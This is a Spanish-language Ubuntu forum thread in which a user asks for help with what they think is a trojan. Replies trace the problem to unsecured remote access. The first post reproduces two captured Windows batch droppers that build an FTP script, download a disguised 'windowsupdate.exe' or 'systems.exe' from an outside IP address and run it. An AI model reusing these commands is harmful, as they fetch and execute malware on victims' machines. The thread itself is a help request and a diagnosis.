Hola gente, como ven, estoy renegando con un troyano que quiero eliminar, ya que, por lo que pude ver, me esta volviendo loca la tecla que habilita el teclado numerico, la deja parpadeando ( es la evidencia de que el troyano actuo ) y obviamente me recarga de laburo el procesador.
Estoy usando Ubuntu 12.04 LTS, ya les pego el script que pude capturar, en una de esas me pueden dar una mano y sobretodo me interesa saber como proceden para detectarlo y prevenirlos.
Saludos Cordiales
------------------------- 1 -------------------------
cmd /c echo open 72.64.46.25 21 >>
ik &echo user windows update >>
ik &echo binary >>
ik &echo get windowsupdate.exe >>
ik &echo bye >>
ik &ftp -n -v -s:ik &del ik &windowsupdate.exe &exit
echo You got owned
-------------------------- 2 -----------------------
ik &echo user aydin kankakanka >>
ik &echo binary >>
ik &echo get systems.exe >>
ik &echo bye >> ik
&ftp -n -v -s:ik &del ik &systems.exe &exit
echo You got owned
Bórralo.
Si estas en Ubuntu borra ese script y ya.
"Yo sólo se que no se nada"
-Sócrates, filósofo griego.
-Normas del foro
como encuentro el script ?
como encuentro el script ?
Hay un problema
Aquí no se da soporte a los S.O. de Microsoft, en MS Windows el malware abunda y es muy difícil decir cuál de todos ellos es y también cuál es su solución, lo que puedes hacer es comprar un antivirus (no crackeado ni similares porque entonces vale para nada) y confiar en que lo detectará, ¿que porqué es de MS Windows? Porque el cmd /c .. se usa en los batch de ese S.O. y en Ubuntu no tiene ningún efecto, aún con Wine pues éste no se ejecuta al inicio.
Si es al iniciar Ubuntu cuando el teclado se queda parpadeando sin poder hacer más que reiniciar, entonces quizá sea un kernel panic, pero las razones quedan demasiado lejos de lo que tú deduces.
-- GC --
Jefe, no uso windows, estoy
Jefe, no uso windows, estoy usando solamente Ubuntu, no es un equipo con SO dual, pero creo que esto le ocurrio a alguno de los usuarios viendo algun email con basura.
La situacion la detecte mientras usaba el editor de texto del LibreOffice y de repente comenzo a escribirse el script que les mostre anteriormente, al terminar quedaba parpadeando la tecla.
Hace una semana que tengo esto y no se produce al iniciar Ubuntu.
Esto
... puede servirte:
http://www.highseverity.com/2011_11_01_archive.html
-- GC --
gracias, creo que esto es la
gracias, creo que esto es la solucion a mi problema, ya esta implementado, asi que ni bien confirme la supresion de esta ejecucion del script, lo comento.
si esto aparece ....
... mientras usas el editor de texto del LibreOffice, elimina el directorio
oculto de libreoffice de cada uno de los usuarios.
Saludos.
Equipo de Ubuntu-es
gracias Gabriel, lo tendre en
gracias Gabriel, lo tendre en cuenta, pero el tema de estar usando Libreoffice fue aleatorio, luego me sucedio buscando un archivo y en la caja de busqueda comenzo a escribirse el script.
Entonces...
... investiga, si no se trata de un hack conectado por vnc o similar.
Saludos.
Equipo de Ubuntu-es
Eliminar Troyano ( SOLCUCIONADO)
Bueno gente, gracias al aporte de rioport, pude solucionar el problema de la ejecucion del script.
A traves del link que me suministro,
http://www.highseverity.com/2011_11_01_archive.html
quedo en evidencia lo mal configurado que tenia el acceso remoto ( sin password, por ej ), una locura total, pero bueno, caminando se hace el camino.
Gracias por el aporte.